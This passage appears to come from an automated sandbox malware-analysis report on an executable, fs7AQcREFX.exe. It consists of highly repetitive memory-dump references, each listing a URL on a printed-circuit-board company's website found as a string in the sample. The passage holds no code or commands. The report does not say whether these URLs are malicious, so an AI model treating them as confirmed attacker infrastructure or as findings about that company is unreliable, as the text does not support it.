00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/myro-intelligent-cloud-forehead-thermometer/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-capabilities/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-design-layout/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-restoration/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcba-services/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/special-offer-specifications/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/stencil/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/testimonial/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/about-us/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/agents-brokers/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/awards-certificates/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/our-facilities/
